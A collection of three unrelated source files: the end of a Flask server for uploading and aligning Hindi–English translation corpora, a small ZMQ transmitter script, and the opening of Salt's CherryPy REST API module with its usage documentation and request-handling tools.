target_lang = request.form.getlist('target_lang')
model_id = request.form.getlist('model_id')
comment = request.form.getlist('comment')
if comment is None or len(comment) == 0:
comment = ['']
if target_lang is None or len(target_lang) == 0 or len(target_lang[0]) == 0 or source_lang is None or len(
source_lang) == 0 or len(source_lang[0]) == 0 or name is None or len(name) == 0 or len(
name[0]) == 0 or domain is None or len(domain) == 0 or len(domain[0]) == 0 or request.files is None or \
request.files['english'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(source_lang=source_lang[0], target_lang=target_lang[0], status=STATUS_PROCESSING,
name=name[0], domain=domain[0], created_on=current_time,
last_modified=current_time, author='', comment=comment[0], no_of_sentences=0,
basename=basename)
corpus.save()
f_eng = request.files['english']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng_filtered.txt')
f_eng.save(filepath_eng)
# f = request.files['hindi']
# filepath = os.path.join(
# app.config['UPLOAD_FOLDER'], basename + '_hin_filtered.txt')
# f.save(filepath)
translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
'/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/'+basename+'_hin_filtered.txt', model_id[0])
# target_lang = LANGUAGES[target_lang[0]]
# translatewithgoogle(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', target_lang)
# os.system('./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
# '_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'r')
for f in f_eng:
english_res.append(f)
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt', 'r')
for f in f_hin:
hindi_res.append(f)
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(sentenceid=str(uuid.uuid4()), status=STATUS_PENDING, basename=str(
basename), source=english_res[i], target=hindi_res[i])
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Corpus.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(hindi_res))
return res.getres()
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
@app.route('/multiple', methods=['POST'])
def upload_file():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
try:
name = request.form.getlist('name')
domain = request.form.getlist('domain')
source_lang = request.form.getlist('source_lang')
target_lang = request.form.getlist('target_lang')
comment = request.form.getlist('comment')
if comment is None or len(comment) == 0:
comment = ['']
if name is None or len(name) == 0 or len(name[0]) == 0 or domain is None or len(domain) == 0 or len(
domain[0]) == 0 or request.files is None or request.files['hindi'] is None or request.files[
'english'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(status=STATUS_PROCESSING, name=name[0], domain=domain[0], created_on=current_time,source_lang=source_lang[0],target_lang=target_lang[0],
last_modified=current_time, author='', comment=comment[0], no_of_sentences=0,
basename=basename)
corpus.save()
f = request.files['hindi']
f_eng = request.files['english']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_hin.pdf')
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng.pdf')
f.save(filepath)
f_eng.save(filepath_eng)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.apply_async(converttoimage, args=(
filepath_eng, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
return process_files(basename)
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
def process_files(basename):
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processhindi(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
translatewithgoogle(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
os.system(
'./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
'_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
english_points = []
english_points_words = []
hindi_points = []
hindi_points_words = []
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_output-t', 'r')
for f in f_eng:
english_res.append(f)
point = fetchwordsfromsentence(f, basename)
english_points.append(point['avg'])
english_points_words.append(point['values'])
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_output-s', 'r')
for f in f_hin:
hindi_res.append(f)
point = fetchwordsfromsentence(f, basename)
hindi_points.append(point['avg'])
hindi_points_words.append(point['values'])
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res,
'english_scores': english_points, 'hindi_scores': hindi_points}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(status=STATUS_PENDING, alignment_accuracy=english_res[i].split(':::::')[1], basename=str(
basename), source=hindi_res[i], target=english_res[i].split(':::::')[0],
source_ocr_words=hindi_points_words[i], source_ocr=str(hindi_points[i]),
target_ocr_words=english_points_words[i], target_ocr=str(english_points[i]))
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Corpus.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(hindi_res))
return res.getres()
def capturewords(result):
print(result)
global words
words.append(result)
def capturetext(result):
words = convertimagetotext(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'] + '.txt', result['basename'])
savewords(words)
def capturealtotext(result):
convertimagetoalto(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'], result['basename'])
removetext(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'])
translateandupdateimage(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'])
converttopdf(result['imagenames'])
def getcurrenttime():
return int(round(time.time() * 1000))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5001)
|
Transmitter.py
|
import os, sys
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import threading
import time
from Communication_220114.Modules.Transmit import TransmitZMQ
tzo = TransmitZMQ.get_instance()
# tzo = TransmitZMQ.get_instance(port="5456")
from Communication_220114.Modules.Infrared_transmit import InfraredTransmit
from Communication_220114.Modules.Time_transmit import TimeTransmit
from Communication_220114.Modules.Variables import *
class Transmitter(object):
def __init__(self, mode="online"):
self.ir_trans = InfraredTransmit(mode=mode)
self.time_trans = TimeTransmit(topic=pose_topic)
def start_IR(self):
t1 = threading.Thread(target=self.ir_trans.start)
t1.start()
def start_Timer(self):
# t1 = threading.Thread(target=self.time_trans.start)
# t1.start()
self.time_trans.start(use_thread=True)
def single_send(self, topic, msg):
tzo.send(topic, msg)
if __name__ == "__main__":
transmitterObj = Transmitter(mode="offline")
transmitterObj.start_Timer()
# while True:
# transmitterObj.single_send(sl_topic, "this is a sound location")
# time.sleep(1)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module (strongly recommend 3.2.x versions due to
an as yet unknown SSL error).
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if not cherrypy.session.has_key('token'): # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if type(lowstate) != list:
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending posiitonal args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
